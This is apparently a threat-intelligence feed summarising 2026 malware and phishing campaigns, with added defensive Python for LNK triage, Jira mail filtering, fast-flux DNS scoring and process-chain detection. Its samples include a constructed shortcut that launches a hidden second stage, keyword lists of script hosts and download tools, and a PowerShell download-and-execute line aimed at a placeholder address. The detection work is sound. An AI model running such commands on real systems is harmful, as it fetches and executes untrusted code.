LATEST THREAT INTELLIGENCE.
Operation Nomad Leopard: Targeted Spear-Phishing Campaign Against Government Entities in Afghanistan
Description: A threat group is targeting Afghan government employees with a lure that mimics an official government document. The campaign, named Operation Nomad Leopard, uses a malicious ISO file containing a PDF decoy, an LNK file, and the FALSECUB malware. The infection chain begins when the victim executes the LNK file, which opens the decoy PDF and runs the malware; the malware establishes persistence and connects to a command and control server. It then performs system reconnaissance, file enumeration, and data exfiltration. The threat actor, assessed to be regionally focused and of low-to-moderate sophistication, hosts its malware on GitHub and has links to Pakistan. The campaign shows careful attention to detail in its lures and abuses a legitimate platform for payload delivery.
Created at: 2026-01-20T08:51:25.640000
Updated at: 2026-02-19T08:03:30.845000
Operation Covert Access: Weaponized LNK-Based Spear-Phishing Targeting Argentina's Judicial Sector to Deploy a Covert RAT
Description: A sophisticated spear-phishing campaign targeting Argentina's judicial sector has been uncovered. The operation uses a multi-stage infection chain to deploy a stealthy Remote Access Trojan (RAT). Attackers exploit trust in court communications by using authentic-looking judicial decoy documents. The campaign employs a weaponized LNK file, a BAT-based loader script, and a covert Rust-based RAT to establish persistent access within judicial environments. The malware performs extensive anti-VM and anti-debug checks, collects system information, and establishes resilient C2 connections. It supports various malicious activities including persistence, file transfer, data harvesting, encryption, and privilege escalation. The campaign demonstrates high operational sophistication and aims to gain long-term access to sensitive legal and institutional data.
Created at: 2026-01-20T08:48:18.007000
Updated at: 2026-02-19T08:03:30.845000
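Both campaigns above hinge on a shortcut that opens a decoy document while launching a second stage, so the first thing a responder wants is to read the shortcut without double-clicking it. The Python below is an added example, not code from either report or from any vendor: it decodes the fixed header and StringData fields of the MS-SHLLINK format, skips the variable-length IDList and LinkInfo blocks by their own size fields, and applies the triage rules a practitioner checks first (target is a script host, suspicious arguments, arguments padded past the width of the Properties dialog, minimised window, borrowed document icon). The sample shortcut is constructed in the block by build_lnk(); the file names, paths and the update.exe second stage are illustrative, not indicators from the campaigns.

```python
import struct

# Constants from MS-SHLLINK (the Windows Shell Link binary format).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = (
    1 << i for i in range(8)
)
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimised

# Interpreters and LOLBins that a shortcut posing as a document has no reason to launch.
SCRIPT_HOSTS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "conhost.exe", "forfiles.exe")
ARG_MARKERS = ("-enc", "-encodedcommand", "-w hidden", "-windowstyle hidden", "iex ",
               "invoke-expression", "downloadstring", "start /b", "start /min",
               "certutil", "bitsadmin", "%temp%", "%appdata%")


def parse_lnk(data: bytes) -> dict:
    """Decode the header and StringData of a .lnk; IDList and LinkInfo are skipped by size."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    show_cmd, = struct.unpack_from("<I", data, 60)
    pos = 0x4C
    if flags & HAS_IDLIST:            # LinkTargetIDList: uint16 size followed by the items
        size, = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINKINFO:          # LinkInfo: leading uint32 size covers the whole block
        size, = struct.unpack_from("<I", data, pos)
        pos += size
    info = {"flags": flags, "show_command": show_cmd}
    # StringData blocks appear in this fixed order, each as uint16 char count + chars.
    for flag, key in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                      (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon_location")):
        if not flags & flag:
            continue
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[key] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return info


def triage(info: dict) -> list:
    """Return findings for a parsed shortcut; an empty list means nothing looked odd."""
    findings = []
    target = info.get("relative_path", "").lower()
    args = info.get("arguments", "")
    if target.endswith(SCRIPT_HOSTS):
        findings.append(f"target is a script host or LOLBin: {target}")
    hits = [m for m in ARG_MARKERS if m in args.lower()]
    if hits:
        findings.append(f"arguments contain {hits}")
    if len(args) > 260:   # the Properties dialog shows only the start of a long Target field
        findings.append(f"arguments are {len(args)} chars long (tail hidden in the dialog)")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (window starts minimised)")
    icon = info.get("icon_location", "").lower()
    if icon and target.endswith(SCRIPT_HOSTS):
        findings.append(f"script host dressed up with icon from {icon}")
    return findings


def build_lnk(relative_path: str, arguments: str, working_dir: str = ".",
              icon_location: str = "", show_cmd: int = 1) -> bytes:
    """Assemble a minimal shortcut (constructed sample data so the example runs offline)."""
    flags = HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | IS_UNICODE | (HAS_ICON if icon_location else 0)
    header = struct.pack("<I16sIIqqqIiIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0,
                         show_cmd, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = string_data(relative_path) + string_data(working_dir) + string_data(arguments)
    if icon_location:
        body += string_data(icon_location)
    return header + body


# Constructed sample: a "PDF" shortcut that opens the decoy and a hypothetical second stage.
MALICIOUS_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\cmd.exe",
    arguments=r'/c start "" .\Circular.pdf & start /min .\update.exe',
    icon_location=r"%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
    show_cmd=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(relative_path=r"..\Documents\Circular.pdf", arguments="")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, triage(parse_lnk(blob)) or "no findings")
```

parse_lnk() only needs the StringData section, which is why it can skip the IDList and LinkInfo blocks without decoding them; if a shortcut sets HasLinkTargetIDList but no RelativePath, the real target lives in the IDList and a fuller parser (or a tool such as LECmd) is needed. Run the file on a quarantined .lnk by replacing MALICIOUS_LNK with the file's bytes.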
Cryptojacking Campaign Exploits Driver to Boost Monero Mining
Description: A sophisticated cryptojacking campaign has been discovered, spreading through pirated software installers. The operation utilizes a customized XMRig miner and a controller component for long-term system access. Unlike browser-based schemes, this campaign deploys system-level malware using deceptive installers masquerading as office software. The modular design enhances resilience, with multiple watchdog processes for persistence. A notable feature is the exploitation of a vulnerable signed driver (CVE-2020-14979) to gain kernel-level access, boosting Monero mining performance by 15% to 50%. The campaign connects to the Kryptex mining pool and uses a Monero wallet for payouts. Organizations are advised to enable Microsoft's vulnerable driver blocklist and implement other protective measures.
Created at: 2026-02-18T16:50:28.365000
Updated at: 2026-02-18T19:15:00.484000
Remcos Revisited: Inside the RAT's Evolving Command-and-Control Techniques
Description: This analysis examines the evolution of Remcos, a Remote Access Trojan that has become a significant global threat. Originally sold as a commercial remote-administration tool, Remcos now gives attackers credential theft, keylogging, screen capture, and webcam control. The latest variant communicates with its command-and-control server in real time, enabling immediate surveillance of the victim. The malware uses techniques such as dynamic API resolution, encrypted configurations, and modular plugins to evade detection. It establishes persistence through registry modifications and runs cleanup routines to remove traces of its activity. The report details Remcos' infection vectors, data exfiltration methods, and its network interactions with command-and-control servers.
Created at: 2026-02-18T16:50:28.910000
Updated at: 2026-02-18T19:14:07.212000
Law Firm Sites Hijacked in Suspected Supply-Chain Attack
Description: GrayCharlie, a threat actor active since mid-2023, compromises WordPress sites and injects content that redirects visitors to NetSupport RAT payloads through fake browser-update pages or ClickFix lures. These infections often lead to follow-on Stealc and SectopRAT deployments. The group's infrastructure is primarily linked to MivoCloud and HZ Hosting Ltd. A cluster of US law firm sites was compromised around November 2025, possibly through a supply-chain attack. GrayCharlie uses two main attack chains: one built on fake browser updates and another on ClickFix-style lures. The group's objectives appear to be data theft and financial gain, potentially including the sale of access to other threat actors.
Created at: 2026-02-18T16:28:06.616000
Updated at: 2026-02-18T19:13:08.210000
Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day
Description: UNC6201, a suspected PRC-nexus threat group, has been exploiting a zero-day vulnerability (CVE-2026-22769) in Dell RecoverPoint for Virtual Machines since mid-2024. The group uses the flaw for lateral movement, persistent access, and deployment of malware including SLAYSTYLE, BRICKSTORM, and a new backdoor called GRIMBOLT. GRIMBOLT, written in C# and compiled with native AOT, represents a shift in tradecraft intended to complicate analysis and improve performance. The actors also employed novel tactics to pivot into VMware infrastructure, including the creation of 'Ghost NICs' and the use of iptables rules for Single Packet Authorization. Dell has released patches for the vulnerability, and the post provides detailed technical analysis, detection opportunities, and hardening guidance.
Created at: 2026-02-18T12:11:55.960000
Updated at: 2026-02-18T16:23:29.895000
Spam Campaign Abuses Atlassian Jira, Targets Government and Corporate Entities
Description: A sophisticated spam campaign abused Atlassian Jira Cloud to bypass security controls and target government and corporate entities. The attackers used legitimate Atlassian Cloud infrastructure to create disposable Jira instances, so that their mail inherited the platform's trusted domain reputation. The campaign targeted specific language groups, including English, French, German, Italian, Portuguese, and Russian speakers, with tailored emails redirecting to investment scams and online casinos. The operation was highly automated and abused SaaS workflows, which shows why trust assumptions about cloud-generated email need to be reassessed. The campaign used the Keitaro Traffic Distribution System for redirects and focused on organizations already using Atlassian Jira, relying on their familiarity with Jira notification emails.
Created at: 2026-02-18T12:11:55.575000
Updated at: 2026-02-18T16:22:58.317000
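One control that follows from this campaign is to stop trusting a notification merely because it arrives from atlassian.net. The Python below is an added example (not Atlassian's code and not the report's tooling) of a mail-gateway check: it recognises a Jira Cloud notifier by the default jira@<site>.atlassian.net sender, compares the site name against the organisation's own Jira Cloud sites, and extracts every link in the body that does not point back at that site. The sample message, the acme-corp allowlist and the example-tds.net redirector are constructed for the example; sites that send from a custom domain would need that domain added to the check.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

ATLASSIAN_SUFFIX = ".atlassian.net"
TRUSTED_SITES = {"acme-corp"}   # assumption: the Jira Cloud sites this organisation actually uses
URL_RE = re.compile(r"https?://[^\s<>\"']+")

# Constructed message imitating a Jira Cloud issue notification; not a real capture.
SAMPLE_MESSAGE = """\
From: "Jira" <jira@acme-corp-support.atlassian.net>
To: finance@example.org
Subject: [JIRA] (SUP-1) Your account has been selected
Content-Type: text/plain; charset=utf-8

Someone mentioned you on SUP-1: Your account has been selected.
Claim your bonus here: https://track.example-tds.net/click?id=9921
View issue: https://acme-corp-support.atlassian.net/browse/SUP-1
"""


def jira_site(from_header: str):
    """Return the Atlassian Cloud site name when the sender is the default Jira notifier."""
    _, addr = parseaddr(from_header)
    local, _, domain = addr.lower().rpartition("@")
    if local == "jira" and domain.endswith(ATLASSIAN_SUFFIX):
        return domain[: -len(ATLASSIAN_SUFFIX)]
    return None


def assess(raw_message: str) -> dict:
    """Classify one message: not-jira, quarantine (unknown site), flag (external links) or allow."""
    msg = message_from_string(raw_message)
    site = jira_site(msg.get("From", ""))
    if msg.is_multipart():   # concatenate the text/plain parts of a multipart message
        body = "".join(part.get_payload(decode=True).decode("utf-8", "replace")
                       for part in msg.walk() if part.get_content_type() == "text/plain")
    else:
        body = msg.get_payload()
    urls = URL_RE.findall(body)
    own_host = f"{site}{ATLASSIAN_SUFFIX}" if site else None
    external = [u for u in urls if urlparse(u).hostname != own_host]
    if site is None:
        verdict = "not-jira"
    elif site not in TRUSTED_SITES:
        verdict = "quarantine"   # notification from a Jira site the organisation never created
    elif external:
        verdict = "flag"         # our own site, but the issue text carries off-platform links
    else:
        verdict = "allow"
    return {"site": site, "urls": urls, "external_urls": external, "verdict": verdict}


if __name__ == "__main__":
    print(assess(SAMPLE_MESSAGE))
```

The site allowlist is the control that matters: a disposable instance created by the attacker is still a real Atlassian site with valid SPF and DKIM, so sender authentication passes and only the site name distinguishes it from the organisation's own.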
Infrastructure of Interest: Medium Confidence FastFlux
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, which combine AI-driven heuristics for anomalous DNS patterns, behavioral analysis of rapid IP rotation, and cross-referencing against global sinkhole data and network telemetry. The IOCs in this pulse are associated with fast-flux networks, which rotate IP addresses and DNS records constantly to evade detection while keeping resilient infrastructure for phishing, malware delivery, or C2 operations. Use this data to enhance DNS-based detection rules, identify flux parent domains, and disrupt threat actor network resilience. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:34:03.778000
Updated at: 2026-02-18T14:11:21.096000
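As an added illustration of the DNS-based detection this pulse recommends (not LevelBlue Labs' own heuristics, which the pulse does not disclose), the Python below scores a passive-DNS log per registrable domain on four features: distinct answer IPs, distinct /16 prefixes as a stand-in for ASN diversity, the minimum TTL observed, and how often the answer changes between consecutive lookups. Prefix diversity is what separates a flux network from a CDN, which also hands out many low-TTL answers but from a few contiguous ranges. The thresholds, the last-two-labels parent-domain rule and the sample records (RFC 5737 and CGNAT addresses) are assumptions made for the example; production tooling would use the Public Suffix List and real ASN lookups.

```python
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_network


@dataclass(frozen=True)
class DnsObs:
    ts: int      # observation time, epoch seconds
    qname: str   # queried name
    rdata: str   # A record answer
    ttl: int     # TTL the authoritative server returned


# Constructed passive-DNS sample; addresses come from RFC 5737 and CGNAT space, not telemetry.
SAMPLE = [
    # flux candidate: two hostnames, answers hop across unrelated /16s every few minutes
    DnsObs(0, "login.flux-example.net", "198.51.100.7", 180),
    DnsObs(180, "login.flux-example.net", "203.0.113.44", 180),
    DnsObs(360, "login.flux-example.net", "192.0.2.19", 180),
    DnsObs(540, "login.flux-example.net", "100.64.3.5", 180),
    DnsObs(720, "pay.flux-example.net", "100.65.9.21", 150),
    DnsObs(900, "pay.flux-example.net", "198.51.100.7", 150),
    DnsObs(1080, "login.flux-example.net", "203.0.113.91", 180),
    # CDN-like: low TTL and many answers, but all inside one /16
    DnsObs(0, "cdn.example.com", "198.51.100.10", 60),
    DnsObs(60, "cdn.example.com", "198.51.100.11", 60),
    DnsObs(120, "cdn.example.com", "198.51.100.12", 60),
    DnsObs(180, "cdn.example.com", "198.51.100.13", 60),
    DnsObs(240, "cdn.example.com", "198.51.100.14", 60),
    DnsObs(300, "cdn.example.com", "198.51.100.15", 60),
    # stable: one address, long TTL
    DnsObs(0, "www.example.org", "192.0.2.80", 3600),
    DnsObs(3600, "www.example.org", "192.0.2.80", 3600),
]


def parent_domain(qname: str) -> str:
    """Naive registrable domain (last two labels); assumption for the example, use the PSL in production."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def flux_features(observations) -> dict:
    """Aggregate observations under their parent domain and compute the flux features."""
    groups = defaultdict(list)
    for obs in observations:
        groups[parent_domain(obs.qname)].append(obs)
    feats = {}
    for parent, rows in groups.items():
        rows.sort(key=lambda r: r.ts)
        changes = sum(1 for a, b in zip(rows, rows[1:]) if a.rdata != b.rdata)
        feats[parent] = {
            "names": len({r.qname for r in rows}),
            "ips": len({r.rdata for r in rows}),
            "prefixes": len({ip_network(f"{r.rdata}/16", strict=False) for r in rows}),
            "min_ttl": min(r.ttl for r in rows),
            "churn": changes / max(1, len(rows) - 1),   # share of lookups whose answer moved
        }
    return feats


def classify(f: dict, max_ttl=300, min_ips=5, min_prefixes=3, min_churn=0.5) -> str:
    """Thresholds are assumptions for the example; tune them against known-good CDN traffic."""
    if f["min_ttl"] > max_ttl or f["ips"] < min_ips:
        return "stable"
    if f["prefixes"] >= min_prefixes and f["churn"] >= min_churn:
        return "fast-flux"
    return "cdn-like"   # many low-TTL answers, but concentrated in a few prefixes


def hunt(observations) -> dict:
    """Map each parent domain to its label; the fast-flux ones are the flux parent domains."""
    return {parent: classify(f) for parent, f in flux_features(observations).items()}


if __name__ == "__main__":
    for parent, f in flux_features(SAMPLE).items():
        print(f"{parent:20s} {classify(f):10s} {f}")
```

The churn feature is what catches a flux network that rotates through a small pool of addresses: even when the distinct-IP count stays modest, consecutive answers keep changing, which a stable host never shows.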
Critical Vulnerabilities in Ivanti EPMM Exploited
Description: Two critical zero-day vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile are being actively exploited, allowing unauthenticated remote code execution on servers. Widespread exploitation has been observed, including reverse shells, web shells, reconnaissance, and malware downloads. Affected sectors include government, healthcare, manufacturing, and technology in multiple countries. Over 4,400 vulnerable instances have been identified. Attackers are moving quickly from initial access to deploying persistent backdoors. Immediate patching is strongly recommended, as exploitation attempts are largely automated and opportunistic.
Created at: 2026-02-18T02:31:55.347000
Updated at: 2026-02-18T12:12:45.216000
New Remcos Campaign Distributed Through Fake Shipping Document
Description: A new phishing campaign has been discovered that delivers a fileless variant of the Remcos RAT. The attack begins with an email impersonating a Vietnamese shipping company, luring victims to open a malicious Word document. This document retrieves a remote RTF file, exploits a vulnerability, and executes VBScript and PowerShell code, resulting in the in-memory loading of a .NET module. The module acts as both a loader and persistence mechanism for the Remcos payload. The Remcos variant (version 7.0.4 Pro) is downloaded into memory and injected into a legitimate system process via process hollowing. It offers extensive remote control capabilities across six categories, including system management, surveillance, networking, communication, and agent control. The analysis details the infection chain, payload structure, and Remcos features, providing insights into this sophisticated attack methodology.
Created at: 2026-01-19T09:40:15.573000
Updated at: 2026-02-18T09:04:06.977000
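As an added example of how the chain described above (Word, then VBScript, then PowerShell, then a hollowed host process) surfaces in process-creation telemetry, the Python below runs three rules over constructed records modelled on Sysmon Event ID 1 fields: an Office application spawning a script host, PowerShell launched with an encoded or hidden command (the -EncodedCommand payload is decoded into the alert), and a script host spawning a .NET or system binary that is a common injection target. Each alert carries the reconstructed ancestry so an analyst sees the whole chain. The events, the RegAsm.exe target, the injection-target list and the decoded command are assumptions for the example, not indicators from the report, and the code is not the report authors' tooling.

```python
import base64

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Generic list of .NET and system binaries often hollowed or injected into (assumption).
HOLLOW_TARGETS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe",
                  "applaunch.exe", "aspnet_compiler.exe", "svchost.exe"}
PS_MARKERS = ("-w hidden", "-windowstyle hidden", "-nop", "bypass", "iex",
              "invoke-expression", "downloadstring", "frombase64string")

# Constructed payload: PowerShell's -EncodedCommand is base64 over UTF-16LE text.
ENCODED = base64.b64encode(
    "IEX ((New-Object Net.WebClient).DownloadString('http://198.51.100.5/stage2'))".encode("utf-16-le")
).decode()

# Constructed process-creation events (Sysmon Event ID 1 field names); not a real capture.
SAMPLE_EVENTS = [
    {"ProcessGuid": "{g1}", "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe",
     "ParentProcessGuid": "{g0}", "ParentImage": r"C:\Windows\System32\userinit.exe"},
    {"ProcessGuid": "{g2}", "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\u\Downloads\Shipping_Docs.docx"',
     "ParentProcessGuid": "{g1}", "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessGuid": "{g3}", "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288",
     "ParentProcessGuid": "{g2}",   # benign: Word's 32/64-bit print helper
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"ProcessGuid": "{g4}", "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe //B C:\Users\u\AppData\Local\Temp\svc.vbs",
     "ParentProcessGuid": "{g2}",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"ProcessGuid": "{g5}", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}",
     "ParentProcessGuid": "{g4}", "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"ProcessGuid": "{g6}", "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": "RegAsm.exe", "ParentProcessGuid": "{g5}",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand text if present, else None (any unique prefix of the switch counts)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        low = tok.lower()
        if len(low) >= 2 and low.startswith("-e") and "-encodedcommand".startswith(low):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except ValueError:        # binascii.Error and UnicodeDecodeError both subclass ValueError
                return None
    return None


def chain(ev: dict, by_guid: dict, max_hops: int = 5) -> str:
    """Walk ParentProcessGuid links to reconstruct the ancestry of one event."""
    names = [basename(ev["Image"])]
    cur = ev
    for _ in range(max_hops):
        parent = by_guid.get(cur.get("ParentProcessGuid"))
        if parent is None:            # parent started before collection; fall back to the recorded name
            names.append(basename(cur.get("ParentImage", "")))
            break
        names.append(basename(parent["Image"]))
        cur = parent
    return " <- ".join(names)


def detect(events) -> list:
    """Apply the three rules; returns one dict per alert with rule, chain and detail."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for ev in events:
        image, parent = basename(ev["Image"]), basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            alerts.append({"rule": "office_spawned_script_host", "chain": chain(ev, by_guid), "detail": cmd})
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(cmd)
            hits = [m for m in PS_MARKERS if m in cmd.lower()]
            if decoded is not None or hits:
                alerts.append({"rule": "suspicious_powershell", "chain": chain(ev, by_guid),
                               "detail": decoded or ", ".join(hits)})
        if parent in SCRIPT_HOSTS and image in HOLLOW_TARGETS:
            alerts.append({"rule": "script_host_spawned_injection_target", "chain": chain(ev, by_guid),
                           "detail": cmd})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["rule"], "|", alert["chain"], "|", alert["detail"])
```

The third rule is a heuristic, not proof of hollowing: process creation alone cannot show that the target's image was replaced in memory, so in a real deployment it should be paired with Sysmon Event ID 8 or 10 (remote thread, process access) on the same target, and the print-helper event in the sample shows why rule one is keyed on script hosts rather than on any child of Word.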
